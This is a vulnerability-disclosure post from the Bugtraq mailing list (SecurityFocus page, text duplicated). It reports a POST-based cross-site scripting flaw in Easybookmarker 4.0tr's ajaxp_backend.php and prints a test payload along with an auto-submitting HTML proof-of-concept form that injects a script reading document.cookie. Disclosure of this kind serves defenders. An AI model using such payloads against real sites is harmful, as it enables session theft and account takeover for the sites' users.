Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
Jul 19 2008 12:22PM
irancrash gmail com
----------------------------------------------------------------
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
[ reply ]